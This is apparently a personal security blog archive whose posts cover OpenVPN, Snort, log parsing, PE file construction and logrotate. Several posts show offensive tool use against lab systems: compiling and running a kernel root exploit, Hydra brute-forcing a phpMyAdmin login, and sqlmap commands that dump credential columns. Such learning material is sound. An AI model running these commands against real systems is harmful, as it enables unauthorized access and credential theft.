"Invincibility lies in the defence; the possibility of victory in the attack" by Sun Tzu

Local priv escalation - linux kernel 2.6.39 and up

2012-01-23T07:15:00.000-08:00

Today, i noticed a new local privilege escalation exploit on exploit-db.com, and decided to check that out. Initially i thought it might be an exploit for very old Linux kernels but that certainly wasn't the case (here is the advisory on securityfocus.com). I figured that i would try this on one of my VMs when i got home from work, but i was a little too impatient. I thought i would remote desktop to my systems and get started. Before i attempted this, i figured why not verify the kernel version of my host machine before initiating a remote desktop session. My laptop is running backtrack 5 R1. So i typed, "uname -sr" and was given the output "Linux 2.6.39.4". Very interesting i thought. Hmm, i figured i'll try it here before any of my VMs (yea i know, bad practice to try someone else's code on a host system before trying it out on your test bench, but i'm not perfect :-P). I went over to exploit-db.com and downloaded the exploit and got to work.

First i made sure i was logged in as an unpriveleged user.
Commands: whoami && id
Output:
noobuser
uid=1001(noobuser) gid=1001(noobuser) groups=1001(noobuser)

I complied the code using: gcc -o local_exploit 18411.c

Then i executed the exploit: ./exploit

I was then greeted with another shell. I then verified who i was logged in as.
Commands: whoami && id
Output:
root
uid=0(root) gid=0(root) groups=1001(noobuser)

There you have it. Even an account named noobuser can pwn systems and become root with lil effort. Unfortunately, noobuser will still continue to be considered anything but elite, atleast in the security community :(.

OpenVPN revisited

2012-01-17T12:25:00.000-08:00

I already touch on the basics on setting up openvpn. In that setup, a remote client(or clients) will only be able to connect to the server and access it's services. This time i want to share a little bit of knowledge on setting things up where remote clients can communicate with other devices on the server network.

Network setup:
Internal:
[router:192.168.1.1]
[client1:192.168.1.100] [client2:192.168.1.101]

Server:
[internal:192.168.1.10] - [vpn:10.10.10.1]

VPN clients:
[vpn:remote user:10.10.10.2]

The server is connected to an internal network, 192.168.1.0/24. When the VPN link is establiished, the vpn network of 10.10.10.0/24 will be established and the server will get the ip address of 10.10.10.1, while connecting clients will get different addresses from the vpn's address pool. Now if you've followed my previous openvpn setup, the remote client would only be able to communicate with that server. However many businesses require that remote vpn users have access to the entire subnet's resources. As you will see, upgrading to this setup is quite simple.

Here are the client and server configs:

Server:

dev tun
port 1194
proto udp
daemon
server 10.10.10.0 255.255.255.0
ca ca.crt
cert server.crt
key server.key
dh dh1024.pem
push "route 192.168.1.0 255.255.255.0"
ifconfig-pool-persist ipp.txt
keepalive 10 120
comp-lzo
max-clients 100
user nobody
group nogroup
persist-key
persist-tun

Client:

client
dev tun
proto udp
remote 11.22.33.44 1194
resolve-retry infinite
nobind
ca ca.crt
cert client.crt
key client.key
comp-lzo
user nobody
group nogroup
verb 3

Things to note:

The "daemon" directive tells openvpn to run in the background and send all output and error messages to a syslog file such as /var/log/syslog or /var/log/messages.

Including the "server 10.10.10.0 255.255.255.0" setting defines the vpn address pool. The first address, 10.10.10.1, will be assigned to the vpn server's tun interface.

The push "route 192.168.1.0 255.255.255.0" setting allows the server to advertise this subnet to connecting clients. When a remote client connects to the vpn server, a route will be added for the subnet 192.168.1.0/24, in that client's routing table.

The ifconfig-pool-persist ipp.txt is very interesting. According to the openvpn's manpage in linux, The goal of this option is to provide a long-term association between clients (denoted by their common name) and the virtual IP address assigned to them from the ifconfig-pool.

The "nobind" directive in the client config simply tells the client to not bind to any address and port. This directive is only suitable for clients.

Very Important things to note:

If you were to use the sample configuration files above as is, you will only have proper communication to the server, but not the subnet behind the server. This is what happens if vpn client 10.10.10.2 tried to ping 192.168.1.100; Since the clients will now have a route added for the 192.168.1.0/24 network, the ping packet will get sent over the vpn tunnel. The server already has a route to the internal network so the packet will be routed, ONLY if after setting up forwarding :). In linux you do this by typing the following in a terminal: "echo "1" > /proc/sys/net/ipv4/ip_forward". This turns your machine into a basic router. Without this, your machine will drop all packets that aern't ment for itself. So assuming we have forwarding in place, our inital ping packet will get forwarded to the internal host. Now we run into more problems.

The internal host will recieve the packet but since it doesn't have a route for the vpn client's network (10.10.10.0/24), it will send its response to its default gateway ( routers in most cases), then the router will consult its internal routing table and learn that it has no route for that network then forward the packet to its default gateway, and so on until the packet is dropped. Note that addresses such as 192.168.0.0 and 10.0.0.0 are dropped by routers on the internet as they are flagged as non-route-able addresses.

The solution to this is to add a route to the default gateway. For me, this would be the router, so i would log onto the routers web interface and goto the routing settings and add a maunal route for the 10.10.10.0/24 network to forward packets to the vpn server, 192.168.1.1.

Now, instead of our router forwarding the packets on the internet (where they will eventually be dropped), since we have an entry for the 10.10.10.0/24 network in the gateways routing table, the packets will be forwarded to the vpn server. Again, we run into another problem, NAT. I suggest that you read up on NAT (network address translation), as it can be quite a challenge to define its purpose and what it is. Therefore i will leave that up to you and your googling skills.

However, the solution to the NAT problem takes only one command on the linux terminal:
"iptables -t nat -A POSTROUTING -s 10.10.10.0/24 -o eth0 -j MASQUERADE"

Now everything should be up and working. Remote vpn clients should now be able to communicate successfully with the other hosts on the servers internal network. Try pinging the other hosts to verify connectivity and if all is well, tap yourself on the shoulder.

Various Server services: Best Practice - compilation

2012-01-11T06:37:00.000-08:00

This blog post will combine some of the best resources that i could find regarding server setups and best practices. Services will include web server (http), ssh, ftp etc. Of course you can find these on your own but why go through dozens of search engine results just to find that 80% of them aern't that useful, when I've done most of the hard stuff for you :).

SSH server (openssh):

Link 1: cyberciti.biz
Link 2: howtoforge.com
Link 3: teknoteknik.wordpress.com

FTP server(vsftpd):
Link 1: Ubuntu Server documentation
Link 2: brainsware.org vsftpd virtual users
Link 3: Centos.org vsftpd config options
Link 4: SFTP vs FTPS

Web Server (apache):
Link 1: apache.orgs tutorial collection (Best list)
Link 1: yolinux.com

Database server (mysql):
Link 1: ubuntu server documentation
Link 2: greensql.com

dhcp server (dhcpd):
Link 1: Ubuntu server documentation
Link 2: Article at consultingblogs.emc.com (very good read)

As i find more interesting articles, i will update this blog post. If you are interested in implementing any of the above services or just looking for some best practices, hopefully you will find these resources useful as i have.

Binary Kung-Fu - Manually create a working windows PE file using a hexeditor

2012-01-01T09:31:00.000-08:00

Sure you can open up visual basic or visual c++ and write your own exe in less than 5 minutes. Why would you want to do this manually with a hex editor? Well for one its fun doing this for the first time on your own, but most importantly, it teaches you a heck of alot. You learn what makes up an exe and how windows uses the data in the executable to map things into memory, etc. It goes without saying that the more you know about something and how it works, the better you will be at fixing potential problems that may arise and also manipulating the component to do other things that it wasn't intended to do in the first place (i.e hacking).

Who might find this useful or where might this knowledge be implemented?
1. Reverse Engineering.
2. Malware Analysis. Malware authors tend to do some pretty darn cool tricks with the PE headers, like actually writing/hiding code in the headers itself.
3. Antivirus research.
4. Exploit research

What you will need.
1. Windows OS. I used windows XP service pack 2 in virtualbox.
2. A hex editor. The one i'm most familiar with is HxD which is freeware.
3. LordPE (edit PE file headers).
4. PE file format reference. You can google "pe file format" and you should get some useable documents. I like the one at pentest.cryptocity.net.

At this point, you should look up the meaning of "little/big Endian" with relation to x86 processors. Certain values in PE files are interpret by windows in a sort of reverse order. For example, a dword (4 bytes) to represent the value of two will be "02 00 00 00". When windows reads this dword, it reads it in reverse as "00 00 00 02".

The first thing to do is open up your hexeditor and create a new project. One important thing that you should be aware of is that although the PE file header can be complex, not all of the fields are of importance to us in order to getting our executable running. However, that doesnt mean we will omit them from the header. We will just have to pad these fields with zeros.

Ok lets start...

Every PE file requires a DOS header. If you analyze most PE files, you will notice like within the first 100 bytes or so, there is some text saying something along the lines of "This program must be run under win32". The DOS header is there for backwards compatibility on 16bit DOS systems. If you attempted to run a win32 program in 16bit DOS, then it will simply print that message then quit.

In the windows 32bit environment, the windows loader only cares about two fields in the DOS header. The first 2 bytes should be "MZ" and the last 4 bytes contains the offset within the file where the PE header starts. The DOS header is 64 bytes long (0x40).

Note: that you would notice the last 4 bytes (as shown in the image below) are "40 00 00 00". Remember the little indian description i gave earlier? When windows reads this file, its gonna take those 4 bytes and flip it around so as you'll get "00 00 00 40" or 0x00000040 (hexadecimal 40). This means that at offset 0x40, windows should look for the PE header.

The next 24 bytes will have the PE signature and image file header. You will notice that i didn't input the typical DOS message "This program must be run under win32", after the DOS header because like i mentioned before, in a win32 environment, the windows executable loader only looks for two things in the DOS header (the MZ signature and the pointer to the PE header (This pointer is at offser 0x3c in the DOS header ) . Also note that we will zero out some of the fields in the image file header. Remember the DOS header is 64 bytes (0x40) long so therefore we will start with the PE signature here at offset 0x40.
In the hex editor, append 24 bytes of zeros to your file so we have the correct length in place for this structure that holds the PE signature and image file structure. Now at offset 0x40, overwrite the first 4 bytes with "50 45 00 00", which is the "PE" signature. At offset 0x44, write "4c 01". This here means that this program is intended to be ran on an intel i386 platform. The next two bytes are the number of sections. We are gonna use two sections, so write "02 00". The next 12 bytes are not important so just leave them zero'd out. At offset 0x54, enter "E0 00" and at offset 0x56, enter "03 01". Offset 0x54 is important and specifies how big the next structure beginning at offset 0x58 should be (this structure is the NT_OPTIONAL_HEADERS field). We derived this value by adding the size of the optional NT header which is 0x60 (96 bytes) and the size of the image data directories. Each entry in the data directories is 8 bytes long and we have up to 16 entries (this equates to 128 bytes). So 96 plus 128 bytes is 224 bytes (or 0xE0). Offset 0x56 is rather complicated. The values in this field can determine whether this file is a dll or executable, if a 32 bit machine is expected and so forth. Its best to observe this field in LordPE. I copied the values for this field in another executable "03 01".

Since we specified in at offset 0x54 that the NT optional header was gonna be 224 bytes (0xE0) long, lets pad our file with 224 bytes as well. Remember, in our file, the NT optional header structure starts at offset 0x58.

At offset 0x58, enter bytes "0B 01". These two bytes tells windows that this is a PE32 file.
From offset 0x5A, the next 14 bytes are not important and can remain all zeros. This takes us to offset 0x68. This field is a dword (4 bytes) and takes an RVA (Relative Virtual Address). An RVA is an offset that is added to a base address. For example, if a base address is 0x00400000 and the RVA to a function named "OpenFile" is "2000", then this equates the function being located at 0x00402000. There are quite a few fields that contain an RVA, but just remember that an RVA is always an offset that is added to the base address (the base address will be defined shortly is the NT optional header) in order to find the location of that object in Virtual memory. RVA's never point to an offset in the executable file. Lets get back on track. At offset 0x68 we will write a dword for an RVA representing the AddressOfEntryPoint (address of entry point is where our program will begin executing code after it is loaded into memory). We write "00 10 00 00". The next 8 bytes are not important so leave them zero'd.

We are now at offset 0x74. This field is the image base that i refered to before as i was explaining RVAs. This field takes a dword and i will use " 00 00 40 00".
The next 8 bytes define the section alignment and the file alignment respectively. They are both dword values. We will keep them the same for simplicity, "00 10 00 00" and "00 10 00 00". It is hard to find the right words to explain section and file alignment, although the concept is quite simple, but i'll try. Imagine a executable file with three sections, each named A, B and C. Sections are like containers, each with a different purpose. Section A can contain the assembly code, section B can contain strings that the programmer hard coded (like passwords, error messages, message box strings, etc and section C can also contain other data. Its not hard to tell that these sections are treated differently, one can be interpreted as code, the others as data. Because of this, sections have attributes, like read, write, execute, etc. Section/file alignment aids the windows loader in identifying the boundaries of each section, so that it correctly knows which parts should be executable and which parts shouldn't. For instance, we have a base image that we defined earlier of 0x00400000. We can have a section alignment of 0x1000. What this means is that we can have a section located at 0x00401000. Lets say section A had 0x50 bytes of code in its section, because of section alignment value of 0x1000, the next section, section B, will reside at 0x00402000. What if section B had 0x15o0 bytes of data. Doing the math, since section B starts at 0x00402000 + 0x1500 0f data, we get 0x00403500. Because thing are alingned at blocks of 0x1000 bytes, section C will begin at 0x00404000. All the while we were talking about section alignment, we were referring to how things are aligned in memory. The file alingment represents how the sections are aligned in the file. For simplicity sake, i gave it the same value as with the section alignment.

We should now be at offset 0x80. The next 28 bytes define fields that are not important to us so leave them filled with zeros.

Update: Actually the definition at offset 0x88 (MajorSubsystemVersion), is a necessary field. This field is two bytes and i used "04 00". Another important field is the SizeOfHeaders field at offset 0x94. This is also an important field, and thankfully, lordpe can populate this field for us quite easily by the push of a button.

This brings us to offset 9c. This field takes a word (2 bytes) that define the subsystem (this indicates if this will be a console application or gui application, etc.). For console mode, we enter the values "03 00". The next 22 bytes can remain zero'd out. At offset 0xB4, this field represents (NumberOfRvaAndSizes) which indicates how many entries will be in the Data directory structure. I will be using the values "10 00 00 00" to indicate 0x10 which is 16 in decimal. This means the windows loader expects to find an array of 16 entries in the image data directory structure which follows next.

We should be at offset 0xB8 ready to initialize our data directory structure. Each entry consists of two dwords (8 bytes). The first list an RVA and the second is a size. We are only interested in adding an import table which is the second entry in the data directory structure. Therefore the first 8 bytes will be zero's, the next 4 will contain the RVA for the import table and the next 4 will define the size of the import table (our import entry RVA will be "00 20 00 00" and we will set the size to "00 10 00 00" ). The remaining 112 bytes represent the rest of the data directory structure and will remain zero'd out. We should now have a hexdump that looks like this.

Next we're onto the final stage of defining our PE header. This will include the section header definitions, If you recall earlier, we defined our NumberOfSection's field in the file header section as "02 00", so therefore, we are expected to define two sections in the section header. Each section is 40 bytes so lets go ahead and add 80 bytes to our file. Again not all fields in this structure are important to us so some will remain zero'd out.

We are currently at offset 0x138 where we will begin our section header definitions. The first 8 bytes are reserved for the section header name. Following good practice, we will make sure we dont use over 7 bytes, just so that our string is null terminated. We will call our first section "code" and append the remaining 8 bytes like so "63 6F 64 65 00 00 00 00". The next 4 bytes is the virtual size definition, and we will set it "00 10 00 00". The next 4 bytes is the RVA for this "code" section. We will use "00 10 00 00". Remember, RVAs get added to the base address, which in our case is 0x00400000, which will result in 0x00401000 being the location in memory where this code "section" will be found. So based on our definition so far, the virtual address for the "code" section is 0x00401000 and its size is 0x1000 (0x00401000 + 0x1000 = 0x00402000). In reality this section can be any size, but due to our definition in the section alignment field (defined in the NT optional header), the sections will always be aligned in blocks of 0x1000. Therefore our second section will begin at 0x00402000 because our section size is less than 0x1000.

Ok, the next 4 bytes define the size of the raw data (data on disk or in the file, not virtual size). Lets give it "00 10 00 00". The next 4 bytes indicate the offset to this section in the file (not in memory). Lets give it "00 10 00 00". The next 12 bytes will be left with zeros. Now the last 4 bytes of our first section header definition indicates the attributes this section should have, like read, write, execute, etc. This field is quite complex and you can use LordPE to help obtain the value you need. Open up another exe in lordpe and observe the section characteristics each section of that executable posses. LordPE will give you the 4 bytes that represent the resulting characteristics of that section. You can simply copy this to your exe.

Do the same for the second section header definition, but note that the RVAs and size of raw data definitions will be different. This is what your hexdump should look like at this point after adding the second section header definition.

LordPe should be able to parse your file now so open it up. LordPE can help point out your mistakes, and allow you to potentially correct them from in there.

You will notice that the size of image is now 0x3000 in LordPE, even though we didn't define it. Thanks to LordPE, it was able to parse the headers and determine what the image size should be. LordPE can also calculate the SizeOfHeaders field and the checksum field automatically for us (in my tests, the checksum field was not necessary and could be left all zero'd).

We have completed defining our PE headers, but we are not finished with the exe. With our two section definitions, we definied some fields, size of raw data and a pointer to raw data. According to our definitions, we should have a text and data section of size 0x1000 (4096 bytes). The text section has a pointer to raw data at file (not virtual) offset 0x1000, while the data section has a file offset of 0x2000. This means that when windows attempts to parse the file it will look at our section header definition and see that the sections are pointing to offsets that dont exist, at least at this point (our file size is not even half of 0x1000 at this point). We will need to pad our file with bytes in accordance to what we indicated in the section headers. Since our last section is the data section, and its size was indicated to be 0x1000, our total file size should be the pointer to raw data of the "data" section + size of raw data for the "data" section as well (0x2000 + 0x1000 = 0x3000). Lets fill or pad our file with zero's till our file size is 0x3000.

IMPORTANT: I cannot stress enough how important it is that you get this file size right. If your file was 0x3001 bytes in size or 0x2FFF (basically if its not exactly 0x3000)and you try to run your file, windows will give you an error saying that the file is not a proper exe file. Basically windows parsed the headers and found a discrepancy between what the header says the file size should be and what it actually is on disk.

So far, we should have a good executable that windows will be able to accept and parse. However, this program has no code and will crash. If you open up this file in a debugger like ollydbg, it will open up successfully (if you made a mistake following the steps before, ollydbg would not be able to open the file).
You will be dropped to the address of entry point (remeber the rva was 0x1000, therefore the base address 0x00400000 + 0x1000 = 0x00401000). This is essentially the "code" section that we defined earlier. Windows is expecting to execute code here but initially, all that is there is a bunch of zero's. Therefore the program crashes. We will need to write meaningful code here. The simplest program i can think of as of this writing was to write code that simply exits. This wouldn't do anything of significance but at least our program will no longer crash as the ExitProcess kernel32 api will cause our program to exit gracefully. To get this functionality, two more things need to be done.

1. We need to define an image import structure for our kernel32.dll. This will have a pointer to another pointer that will point to the "ExitProcess" api found within kernel32.dll.
2. We will need to write code that will simply call the function. Generating the relevant code can be made simple by using a debugger like olly. Here are the bytes that i used at offset 0x1000, i.e, the "code" section and also the AddressOfEntrypoint RVA. "FF 15 70 20 40 00". You can see screen shots of how i set up offset 0x1000 and 0x2000 in my file.

Congratulations !!!. At this point, you should have a working PE executable file that simply just exits. If you wanted more functionality, you would need to import DLLs. Therefore, you would need to make sure that each dll has an entry in the image import descriptor structure (in our example, we only had one for kernel32.dll) and then the functions that these dlls provide must be defined like we did with "ExitProcess" (Note that function names ARE case sensitive). The rest is dependent on your assembly skills, to manipulate the registers and setup the stack for the relevant functions calls to make a reasonable program.

I hope this was helpful to some and would be used as a reference for researchers. I recommend reading the following references below as they've provided me with all the necessary information that i need to succeed at this binary hackery.

Resources / Good Reading:
Hxd hex editor
Tiny Pe project
Pentest.cryptocity.net PE format PDF
LordPE
Microsoft PE Header structure definitions

Helpful log parsing tips

2011-12-05T04:55:00.000-08:00

Most programs and services produce logs. When a user visits an apache web server, the service will most likely keep a log of that request, along with the date and requester's ip address. Other details might be logged as well. Here us an example of some entries in a logfile:

192.168.1.20 - - [21/Sep/2011:11:04:40 +1000] "GET / HTTP/1.0" 200 468
192.168.1.20 - - [21/Sep/2011:11:07:48 +1000] "GET /login.php HTTP/1.0" 200 6433

Log files would usually contain hundreds of such entries, most, if not all of which are important to us. If there is an issue with a service, perhaps there is an entry in the logfile that can tell us why. Another scenario is where management require some statistical information. For example, how many unique IP addresses visited their website in the past hour and what pages did they visit. Or which web pages are the most frequently visited.

If you look around on the web, you will be able to find tools that would retrieve most of this information for you. However, some of these tools may not have the functionality built in to retrieve all the data you require. Hence, knowing how to do things yourself might come in handy.

Here are some examples. I used the following log entries in my examples.

192.168.1.20 - - [21/Sep/2011:11:04:40 -0500] "GET / HTTP/1.0" 200 6443
192.168.1.25 - - [21/Sep/2011:11:07:48 -0500] "GET /logo.gif HTTP/1.0" 200 4006
192.168.1.22 - - [21/Sep/2011:11:08:40 -0500] "GET /forum.php HTTP/1.0" 200 468
192.168.1.20 - - [21/Sep/2011:11:08:48 -0500] "GET /sports.php HTTP/1.0" 200 98002
192.168.1.22 - - [21/Sep/2011:11:09:42 -0500] "GET /basketball.htm HTTP/1.0" 200 45869
192.168.1.22 - - [21/Sep/2011:11:09:48 -0500] "POST /login.php HTTP/1.0" 404 501
192.168.1.25 - - [21/Sep/2011:11:09:50 -0500] "POST /login.php HTTP/1.0" 404 501
192.168.1.20 - - [21/Sep/2011:11:09:55 -0500] "GET / HTTP/1.0" 200 6433

We can parse the unique IP addresses that visited our apache website. We can take this step further and sort these IP address by the one with the most requests. This will give you an idea of which IP address chatted the most with the server and which ones were least talkative.

awk '{print $1}' access.log | sort | uniq -c | sort -nr

We can generate statistics based on HTTP status codes. From there, you can see how many successful requests were made, as well as how many bad requests were made for non-existent pages or files. Based on our example log entries above, we should get 6 successful requests and 2 "file not found" requests.

awk '{print $9}' access.log| sort | uniq -c | sort -rn

To see only the log entries that genereated the HTTP status code of 404 or "file not found" requests.

awk '$9 == "404"' access.log

Continuing from the last example, if we only wanted to see the IP address and the request that was made that triggered the 404 status code:

awk '$9 == "404"{print $1, $7}'

Lets take the last example a little further. Say management wanted to know the number of requests that resulted in a "404" status code between 11 AM to 12 PM on 21/Sep/2011.

awk '$9 == "404"' access.log | egrep "21\/Sep\/2011" | awk 'substr($4,14,2) == "11"'

Lastly, if you want to check how many bytes your server has served up for a particular day, awk and grep can help us agian. The number after the status code in the log entries is the size (in bytes) of the object returned to the client from the request.
In my example, I omit the entries with status code "304". I do this because an intelligent user agent (browser) may already have the object in its cache. A 304 indicates that the cached version has the same timestamp as the 'live' version of the file so they don't need to download it. If the 'live' file was newer then the response would instead be a 200.

egrep "21\/Sep\/2011" | access.log | awk '$9 != "304"{sum+=$10}END{print sum}'

The result of this is in bytes. To convert to kilobytes and or megabytes, the print statement at the end would be {print sum/1024/1024}.

Its important to know that these techniques are not limited to only apache log files. Any log file can be parsed using the combination of grep, awk, sort, uniq and even sed (sed can be used to clean up the output). Under linux systems, the log files at /var/log can be parsed in a similar fashion with slight modifications to the parameters passed to the programs. If you wanna get fancy, you can output the data to a text file and run a php script that reads this file and outputs a nicely formatted HTML report page.

Resources / Good Reading:
www.the-art-of-web.com
status codes

Snort gets a little help from swatch

2011-11-09T08:56:00.000-08:00

Wanna know who is attacking your network and be notified ASAP? Maybe this setup might help you. Snort is a well developed open source IDS/IPS (intrusion detection/prevention system). An IDS is basically a sniffer (like tcpdump, wireshark, etc.) that looks at all the packets on the network and keeps an eye out for only interesting information. When it sees information that might be of interest (like a tcp port scan), it will log the packets pertaining to the port scan. An IDS will only log these packets, but doesn't take the extra steps to prevent the network attack from happening. An IPS will take the role of the IDS one step farther and has the ability to perform other actions in addition to logging. These might include blocking ports, setting firewall rules to block traffic based on port or ip address, etc.

Lets start using snort.

Snort can be used as a regular sniffer, like tcpdump. See the commands below:
# snort -dev -i eth0

To log the packets to a file, use the -l switch and specify a directory. Snort will create the file for you.
# snort -dev -i eth0 -l /root/snort/

Depending on your defaults, snort may log in Ascii mode or pcap mode. You can use the -K switch to specify (ascii, pcap or none).
# snort -K Ascii -dev -i eth0 -l /root/snort

To log packets in tcpdump format you can use the -b only.
# snort -b -dev -i eth0 -l /root/snort

Using snort as an IDS

This is accomplished by specifying a config file on the command line.
# snort -c snort.conf -i eth0

I always like to use -A for alert mode. Basically a file gets created called alerts, and when bad traffic is seen on the network, snort will make a note of it in this alert file. There are a few options for these, but i like using the fast option (see man snort for more details). Note that two files are created, the alert file and the snort.log file. The alert file will contain syslog like log entires when an attach happens and the snort log file will contain the bad traffic data(in tcpdump format if thats the option you went with) that triggered the alerts.
# snort -A fast -c snort.conf -i eth0

The snort.conf file is well doucmented and easy to configue. Here is a very barebones config file example.

var HOME_NET any
var EXTERNAL_NET any
var DNS_SERVERS $HOME_NET
var SMTP_SERVERS $HOME_NET
var HTTP_SERVERS $HOME_NET
var SQL_SERVERS $HOME_NET
var TELNET_SERVERS $HOME_NET
var HTTP_PORTS 80
var SHELLCODE_PORTS !80
var ORACLE_PORTS 1521
var AIM_SERVERS [64.12.24.0/24,64.12.25.0/24,64.12.26.14/24,64.12.28.0/24,64.12.29.0/24,64.12.161.0/24,64.12.163.0/24,205.188.5.0/24,205.188.9.0/24]
var RULE_PATH $IDS_BASE/rules

include /etc/snort/classification.config
include $RULE_PATH/icmp.rules

The above example snort.conf will look for bad icmp traffic. If you ping your loopback interface, snort will generate some alerts and start logging this traffic.

How swatch can help you.

I blogged about swatch already so you can refer to my posting on that. Swatch can be used to monitor a snort alert file and be configured to send an email to you when a specific alert gets triggered. See the video below for a demonstration.

combining snort and swatch from aerokid240 on Vimeo.

One issue that will arise is that you may start recieving multiple emails. For example, if 4 ping packets were sent from the loopback address, then 4 alerts should be triggered by snort. Therefore, when swatch is notified about these alerts, 4 emails would be sent instead of just one. So if snort sets the same alert 100 times, you can expect 100 emails in this setup. I'm sure you can set swatch to run a script that would overcome this problem, but that is beyond what i wanted to demonstrate in this post.

Resources/Good Reading:
snort.org
pauldotcom.com

Uncloaking the unprotected with DirBuster

2011-11-08T11:19:00.000-08:00

The following two paragraphs were taken from owasp.com on DirBuster.

DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.

However tools of this nature are often as only good as the directory and file list they come with. A different approach was taken to generating this. The list was generated from scratch, by crawling the Internet and collecting the directory and files that are actually used by developers! DirBuster comes a total of 9 different lists (Further information can be found below), this makes DirBuster extremely effective at finding those hidden files and directories. And if that was not enough DirBuster also has the option to perform a pure brute force, which leaves the hidden directories and files nowhere to hide! If you have the time ;)

Here is a video that i've created illustrating one of the ways DirBuster can be used and why its very important to take the necessary steps to secure your data, rather than just hiding it. Because the webmaster didn't properly configure his webserver for security, it was possible to gain access to some data.

Dirbuster from aerokid240 on Vimeo.

Resources / Good Reading:
owasp.com

Brute forcing html login forms

2011-11-05T07:10:00.000-07:00

Lately, i been really busy at work and havent researched or read any books in the past two weeks. Already i felt like my brain was slipping away. So i decided to fire up a DVL (Damn Vulnerable linux), which is a live distribution that has many vulnerabilities for one to practice their security skills. I haven't used it before so i didn't know what i was getting into. I did a port scan and found two open ports (631 and 3306/mysql). Initially, i tried to identify the MySQL version using metasploit but that didn't work. I then tried using the metasploit mysql bruteforcer, to do a dictionary attack on the service, but metasploit complained that the attack will only work on older versions of MySQL. I was clueless. I began looking around the DVL and then started apache (isn't running by default) from the desktop shortcuts. I went back to my attacking backtrack 5 machine and fired up Firefox then went to the relevant webpage URL for the DVL machine. Interesting enough, it gave me a directory listing. I saw phpmyadmin listed so i decided to go in their. I was presented with the login page. I tried some random stuff i thought might work and had no success. I was failing miserably. What i needed to do at that point was automate the password guessing process. This is where hydra comes in.

This is the code i used.
# hydra -l admin -P passwords.lst -e ns -vV 192.168.2.10 http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:denied"

After a few minutes, i had a smile on my face. Hydra found two usable passwords for the username admin. Just to avoid any spoilers, i wouldn't post the relevant passwords. Out of curiosuty, i decided to run hydra again for the user root.

# hydra -l root -P passwords.lst -f -e ns -vV 192.168.2.10 http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:denied"

I decided to use the "-f" switch so hydra would quit immediately when a matching password is found. Indeed, after a few seconds, i had a usable password. In reality, there is nothing to fancy about this as the accounts and their passwords seem to be at their defaults and if you knew what mysql accounts default credentials are, then you know that bruteforcing here was a dead waste of time :). Either way, i had a foot in the door and the point of this was to demonstrate how you can bruteforce html login forms with hydra.

BTW, adding the "-U" switch would give you usage information when using the "http-post-form" service.

Update: It turns out that you can use any username with the password of "0" for some reason :). Now that you have access, to the mysql database, you can snoop around to get information and user logins for web apps like wordpress and joomla.

Resources/Good Reading:
OWASP.org

Mail Serving with Postfix and dovecot

2011-09-19T06:21:00.000-07:00

There are tons of great documentation out there showing you how to set this SMTP server up. Postfix is very popular and a great alternative to the even more popular sendmail. Here are some good resources that i used to learn how to set this up:

Ubuntu postifx documenation
Postfix virtual mailbox setup
Centos postfix setup
Centos postfix restrictions

Setting up dovecot is simple enough. Check out the following resources:
Ubuntu dovecot configuration
wiki.Dovecot.org virtual users
wiki.Dovecot.org virtual users example
wiki.dovecot.org authentication/password schemes
Integrating dovecot SASL with postfix
wiki.dovecot.org cram-md5 howto

Postifx/dovecot mail system can make use of actual system users or virtual users. With system users, you would have to create a new system users (eg, adduser mark) for each user. I don't really want to have to create a new system user everytime to add a new mail user. Using virtual users with virtual mailboxes suites my installations better (more personal preference). The key thing to remember is that you would have to make changes to both postfix and dovecot configutations to get this to work. In postfix, the key settings that need to be modified can be seen here. In dovecot, this example will show you how to setup the virtual user accounts for SASL login authentication.

File Backups with logrotate

2011-08-31T12:13:00.000-07:00

Logrotate is a log rotating program, that usually gets executed daily by a cron job. It has a main configuration file located at "/etc/logrotate.conf" and additional configs are usually store in the directory located at "/etc/lofrotate.d". The options in the configuration file are dead simple to understand and can be learned from its manpage (man logrotate). Logrotate is mainly used to backup and rotate log files but can be used on any file.
The following example will show how to back up contents of the /var/www folder.

First thing we will do is create a directory to house our configuration file and the backups. We will do this in our home directory at "/home/user".

# mkdir backups
# cd /home/user/backups

We then create the config file named rotate.conf:

### logrotate config file
/home/user/backups/www.tar{
rotate 4
daily
compress
copy
prerotate
rm /home/user/backups/www.tar
tar -cf /home/user/backups/www.tar /var/www
endscript
}
###

A quick run down of the config options:
-The first line gives the path to the file we want to backup and rotate
-Rotate 4 will keep up to 4 backups and rotate onwards
-daily is set to have log files rotated daily
-Compress will use gzip to compress the file by default
-copy just makes a copy of the original file for backup
-The prerotate directive allows us to run commands before rotating the logs. The commands i used should be straight forward enough to understand, but anything can go here. You must end the prerotate directive with endscript.

In our setup, logrotate will need a dummy file called www.tar to start off properly, so we will create an empty file with that name:

# touch www.tar

Thats it for the configuration. Now to run logrotate issue the following:

# logrotate -f /home/user/rotate.conf

the "-f" option tells logrotate to force the rotation.

Running this command a few times (7-8) will basically cause several backups to be created and rotated as need be. You would eventually notice that only 4 backups are being kept as per our configuration.

Resouces/Good Reading:
kangaroobox.blogspot
manpage
thegeekstuff.com

Tips on securing apache webserver

2011-08-26T18:28:00.000-07:00

I came across a nice article at linux.com that i wanted to share. It was very useful to me and i'm sure it will be to someone else as well. I've read other articles on the topic but i found that this one does the best job in explaining why certain options were used and their benefits. If you have an apache server out there and you're skeptical about its security, then maybe reading this article might put some things into perspective for you and set you on the right path.

Link: Securing Apache

Automating sql injection with Sqlmap

2011-08-07T15:51:00.000-07:00

Sqlmap is an automated sql injection tool written in python. More information can be found at this link.

sqlmap from aerokid240 on Vimeo.

Commands used.

sqlmap -u 'http://127.0.0.1/exploit/newspage.php?id=1' -p 'id' --dbs

sqlmap -u 'http://127.0.0.1/exploit/newspage.php?id=1' -p 'id' -D exploit --tables

sqlmap -u 'http://127.0.0.1/exploit/newspage.php?id=1' -p 'id' -D exploit -T members --columns

sqlmap -u 'http://127.0.0.1/exploit/newspage.php?id=1' -p 'id' -D exploit -T members -C username --dump

sqlmap -u 'http://127.0.0.1/exploit/newspage.php?id=1' -p 'id' -D exploit -T members -C password --dump

Sqlmap options used:
-u Target url
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate

Resources/Good Reading:
sqlmap
pauldotcom

From SQL injection to Shell

2011-08-02T16:00:00.000-07:00

